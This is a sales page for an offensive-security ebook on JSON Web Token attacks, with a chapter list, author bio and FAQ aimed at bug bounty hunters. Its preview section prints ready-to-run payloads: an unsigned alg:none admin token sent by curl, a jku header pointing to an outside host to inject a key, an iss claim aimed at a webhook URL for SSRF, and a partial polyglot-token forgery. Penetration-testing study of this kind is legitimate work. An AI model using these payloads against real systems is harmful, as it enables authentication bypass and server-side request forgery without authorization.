Broken Token Series — Book 1

Original Research — Not Found Anywhere Else

BROKEN TOKEN: JWT

Know every way to break a JWT. Every technique, every payload, tested and ready. Algorithm confusion, header field injection, claim manipulation, format attacks — including original research not documented in any public resource.

$19 $29 SAVE $10

Get Your Copy

30-day money-back guarantee · PDF format · Instant download

COVER IMAGE

Taste the Content

REAL PAYLOADS. REAL TECHNIQUES.

Every technique comes with framework context, CVEs, and a ready-to-use command. No theory without payload.

Chapter 3 — Algorithm Attacks

NoAlg Bypass — strip the signature entirely

TOKEN=$(echo -n '{"sub":"admin"}' | base64 | tr -d '=' \ | xargs -I{} echo "eyJhbGciOiJub25lIn0.{}.") curl -H "Authorization: Bearer $TOKEN" \ https://target.com/api/endpoint

Chapter 4 — External Key Injection

jku Injection — server fetches your public key

header = b64url(json.dumps({ 'alg': 'RS256', 'jku': 'https://hit.brutelogic.net/jwks.json', 'kid': '1' }, separators=(',',':')))

Chapter 6 — Claim Manipulation

iss URL Injection — SSRF via OIDC discovery

echo -n '{"sub":"admin","iss":"https://webhook.site/YOUR-ID"}' \ | base64 | tr -d '=' \ | xargs -I{} echo "eyJhbGciOiJub25lIn0.{}."

Chapter 7 — Format Attacks

Polyglot Token — forged claims, valid signature

TOKEN="<original token>" AAAA=$(echo $TOKEN | cut -d'.' -f1) BBBB=$(echo $TOKEN | cut -d'.' -f2) CCCC=$(echo $TOKEN | cut -d'.' -f3) XXXX=$(echo -n '{"sub":"admin","role":"admin"}' \ | base64 | tr -d '=')

Table of Contents

ALL 7 CHAPTERS

Each chapter follows the same structure: framework behavior, CVEs, attack primitives, detection.

CH 01

Introduction

What JWTs are, why they break, how to use this book

2 pages

CH 02

JWT Fundamentals

Header fields, registered claims, custom claims by framework, signing algorithms

3 pages

CH 03

Algorithm Attacks

NoAlg, alg confusion, ECDSA blank signature, whitespace bypass, array wrapping

5 pages

CH 04

External Key Injection

kid path traversal, kid URL injection, jku, x5u — server fetches attacker-controlled key

6 pages

CH 05

Embedded Key Injection

jwk, x5c, x5t+x5c — key material inside the token, no infrastructure needed

5 pages

CH 06

Claim Manipulation

iss, aud, jti attacks — SSRF, SQL injection, broken authentication, claim enumeration

8 pages

CH 07

Format Attacks

Polyglot token, sign/encrypt confusion — the format itself as the attack surface

6 pages

APX

Appendix — DIY Infrastructure

Keypair generation, jwks.json, cert.pem, hosting, webhook.site for SSRF confirmation

3 pages

Coverage

EVERY ATTACK LAYER

From the algorithm field to the token format itself — every layer where JWT security breaks.

Original Research

kid URL injection, iss→SSRF via OIDC discovery, jti SQL injection structural backing — techniques not found in any public tool, writeup, or existing resource.

Algorithm Attacks

NoAlg bypass, RS256→HS256 confusion, ECDSA blank signature, whitespace regex bypass, array wrapping. 7 CVEs documented.

External Key Injection

kid path traversal, kid URL injection, jku injection, x5u injection. Server fetches your key — auth bypass and SSRF simultaneously.

Embedded Key Injection

jwk, x5c, x5t+x5c combined. Key material travels inside the token — no remote infrastructure needed.

Claim Manipulation

iss spoofing, SSRF via OIDC discovery, aud bypass, jti SQL injection, cross-service relay, claim enumeration by framework.

Format Attacks

Polyglot token (CVE-2022-39227) — valid signature, forged claims. Sign/encrypt confusion — public key encrypts, no signing needed.

Series

EXPAND YOUR ARSENAL

Four independent books. Each covers a distinct token type and attack surface. No reading order required.

BOOK 01

JWT

Algorithm attacks, key injection, claim manipulation, format attacks.

Available now

BOOK 02

OAuth

redirect_uri bypass, PKCE downgrade, token leakage, cross-tenant hijacking.

Coming soon

BOOK 03

OIDC

iss injection, nonce bypass, mix-up attacks, UserInfo manipulation.

Coming soon

BOOK 04

SAML

XML signature wrapping, XXE, parser differential attacks, SSO bypass.

Coming soon

Author

BRUTE LOGIC

Rodolfo Assis

@BRuteLogic

15+ Years 1,461 Reports KNOXSS Creator Brute One BSides Boston 2016 DEF CON 25 Ekoparty 2025 Top 200 Influencer 2021 4 Ebooks 64K+ Followers

Brazilian offensive security researcher with 15+ years breaking web applications. Creator of KNOXSS — the most comprehensive automated XSS service, live since 2016 — and X55.is, a universal XSS delivery domain. Founder of Brute One, an AI assistant for bug bounty hunting with tool execution capabilities and proprietary offensive knowledge.

Author of the following offensive security ebooks: First Bounty, The Brute Art of Bypass, SSRF Mastery Series — Fundamentals, and now Broken Token: JWT. Writing Security in Collapse, a cyberpunk doctrine for the Intelligence Age. Building the King of Noobs recon suite on GitHub — reKover, unKover, disKover.

Spoke at BSides Boston 2016, DEF CON 25, and Ekoparty 2025. Ranked #1 globally on Open Bug Bounty in 2015 with 1,461 reports. 1,000+ vulnerabilities disclosed against Oracle, Apple, Microsoft, Samsung, Slack, Uber, LinkedIn and others. Published the XSS Cheat Sheet series (2018–2024). Listed among 200 Global Cybersecurity Influencers by Check Point (2021). 64K+ followers @BRuteLogic.

FAQ

QUESTIONS

Who is this for?

Intermediate to advanced bug bounty hunters and pentesters who already know what a JWT is and want to know every way to break one. Not a beginner guide.

How is this different from what's already out there?

Existing resources cover the same surface-level techniques and stop there. This book documents the structural reason behind each attack, maps each technique to a classical vulnerability class — SSRF, SQL injection, broken authentication — and includes original techniques not found in any public resource or tool.

Do the commands actually work?

Yes. Every command was tested on Ubuntu 24 before inclusion. No placeholder code, no theoretical payloads.

Get the book

STOP FINDING THE SAME BUGS EVERYONE ELSE FINDS.

The techniques your competition doesn't know. 38 pages. 47 techniques. Original research. Tested payloads.

$19

$29

SAVE $10

Buy Now

PDF format · Instant download · 30-day money-back guarantee

AI-assisted creation, thoroughly reviewed by the author. All technical content tested for accuracy.
Errors or suggestions: assis@brutelogic.net